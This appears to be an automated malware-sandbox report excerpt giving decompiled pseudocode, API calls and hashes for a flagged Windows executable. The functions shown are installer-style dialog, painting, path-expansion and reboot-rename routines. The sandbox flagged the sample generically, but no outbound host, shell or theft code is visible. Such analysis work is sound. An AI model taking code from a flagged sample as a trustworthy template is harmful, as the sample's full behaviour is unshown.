SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
ImageList_Destroy.COMCTL32(?), ref: 0040545B
GlobalFree.KERNEL32(?), ref: 0040546B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
ShowWindow.USER32(?,00000000), ref: 00405615
GetDlgItem.USER32(?,000003FE), ref: 00405620
ShowWindow.USER32(00000000), ref: 00405627

Strings

M, xrefs: 004051E5
, xrefs: 004055FF
N, xrefs: 004052C6

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18

Uniqueness

Uniqueness Score: -1.00%

Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t69 =  *0x422720; // 0x59d41c
						_t29 = _t69 + 0x14; // 0x59d430
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}

0x00404795
0x004048c2
0x0040491f
0x00404923
0x004049f0
0x004049f2
0x004049f2
0x004049f8
0x004049f8
0x004049fb
0x00000000
0x00404a02
0x00404931
0x00404937
0x00404941
0x0040494c
0x0040494f
0x00404952
0x0040495d
0x00404960
0x00404967
0x00404974
0x00404985
0x0040498b
0x00404993
0x004049a1
0x004049a7
0x004049a7
0x00404967
0x004049b1
0x00000000
0x004049bc
0x004049c0
0x004049d0
0x004049d0
0x004049d6
0x004049e2
0x004049e2
0x00000000
0x004049e6
0x004049b1
0x004048cd
0x00000000
0x004048df
0x004048df
0x004048e4
0x004048e4
0x004048ea
0x00000000
0x00000000
0x00404913
0x00404915
0x0040491a
0x00000000
0x0040491a
0x004048cd
0x0040479b
0x0040479e
0x004047a3
0x004047b4
0x004047b4
0x004047bc
0x004047bf
0x004047c3
0x004047c6
0x004047ca
0x004047cd
0x004047d0
0x004047d3
0x004047da
0x004047dc
0x004047dc
0x004047e6
0x004047f3
0x004047fd
0x00404802
0x00404805
0x0040480a
0x00404821
0x00404828
0x0040483b
0x0040483e
0x00404852
0x00404859
0x0040485e
0x00404863
0x00404863
0x00404871
0x0040487f
0x00404891
0x00404896
0x004048a6
0x004048a8
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
GetDlgItem.USER32(?,000003E8), ref: 00404835
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
GetSysColor.USER32(?), ref: 00404863
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
lstrlenW.KERNEL32(?), ref: 00404884
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
GetDlgItem.USER32(?,0000040A), ref: 004048FF
SendMessageW.USER32(00000000), ref: 00404906
GetDlgItem.USER32(?,000003E8), ref: 00404931
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
LoadCursorW.USER32(00000000,00007F02), ref: 00404982
SetCursor.USER32(00000000), ref: 00404985
LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
SetCursor.USER32(00000000), ref: 004049A1
SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2

Strings

Call, xrefs: 00404960
N, xrefs: 0040491F

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x004062ae
0x004062b7
0x004062be
0x004062c8
0x004062dc
0x00406304
0x0040630b
0x0040630f
0x00406313
0x00406333
0x0040633a
0x00406344
0x00406351
0x00406356
0x0040635b
0x0040635f
0x0040636e
0x00406370
0x0040637d
0x00406381
0x0040641c
0x00000000
0x00406397
0x004063a4
0x004063c8
0x004063cc
0x004063eb
0x004063ef
0x004063ef
0x004063f1
0x004063fa
0x00406405
0x00406410
0x00406416
0x00000000
0x00406416
0x004063ce
0x004063d1
0x004063dc
0x004063d8
0x004063da
0x004063db
0x004063db
0x004063e3
0x004063e5
0x00000000
0x004063e5
0x004063af
0x004063b5
0x00000000
0x004063b5
0x00406381
0x0040635f
0x004062de
0x004062e9
0x004062f2
0x004062f6
0x00000000
0x00000000
0x004062f6
0x00406427

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004062F2

Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF

GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 0040630F
wsprintfA.USER32 ref: 0040632D
GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
GlobalFree.KERNEL32(00000000), ref: 00406416
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D

Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe,80000000,00000003), ref: 0040615C
Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E

Strings

uB, xrefs: 0040630B
mB, xrefs: 004062D7
%ls=%ls, xrefs: 00406323
[Rename], xrefs: 00406397, 004063A9
uB, xrefs: 00406304

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]$mB$uB$uB
API String ID: 2171350718-2295842750
Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 004066A5 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x42923c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a298 + _t44 * 2;
				_t45 = 0x428200;
				_t108 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

0x004066a5
0x004066a5
0x004066a5
0x004066ab
0x004066b0
0x004066c1
0x004066c1
0x004066c9
0x004066ca
0x004066cb
0x004066cc
0x004066cf
0x004066d7
0x004066d9
0x004066ea
0x004066ed
0x004066ed
0x004066f1
0x004066f7
0x004066fa
0x004068d5
0x004068d5
0x004068e0
0x004068ec
0x004068ec
0x00000000
0x00406700
0x00406705
0x0040671a
0x0040671b
0x00406721
0x004068b3
0x004068c1
0x004068c4
0x004068c4
0x004068b5
0x004068b8
0x004068bb
0x004068bd
0x004068bd
0x004068c6
0x004068c6
0x004068cc
0x004068cf
0x00406702
0x00000000
0x00406702
0x00000000
0x004068cf
0x00406727
0x0040672a
0x00406739
0x00406740
0x0040674c
0x0040674f
0x00406752
0x00406753
0x00406758
0x0040675e
0x00406761
0x00406764
0x00406857
0x0040685c
0x0040688f
0x00406894
0x00406899
0x0040689e
0x0040689e
0x004068a3
0x004068a9
0x004068ac
0x00000000
0x004068ac
0x0040685e
0x00406861
0x00406864
0x00406879
0x00406880
0x00406866
0x0040686d
0x0040686d
0x00406888
0x0040688b
0x0040684f
0x00406850
0x00406850
0x00000000
0x0040688b
0x00406771
0x00406775
0x00406775
0x00406776
0x00406778
0x004067b5
0x004067b8
0x004067c8
0x004067cb
0x004067d3
0x004067d9
0x004067d9
0x00406834
0x00406834
0x00406836
0x00000000
0x00000000
0x004067dd
0x004067e2
0x004067e3
0x004067e5
0x004067fc
0x0040680a
0x00406810
0x00406812
0x00406830
0x00406830
0x00406830
0x00000000
0x00406830
0x00406818
0x00406821
0x00406824
0x0040682a
0x0040682e
0x00000000
0x00000000
0x00000000
0x0040682e
0x004067f6
0x004067f8
0x004067fa
0x00000000
0x00000000
0x00000000
0x004067fa
0x00000000
0x00406834
0x004067c0
0x00000000
0x0040677a
0x00406798
0x004067a1
0x0040683e
0x00406842
0x0040684a
0x0040684a
0x00000000
0x00406842
0x004067ab
0x00406838
0x0040683c
0x00000000
0x00000000
0x00000000
0x0040683c
0x00406778
0x00000000
0x00406705

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067C0
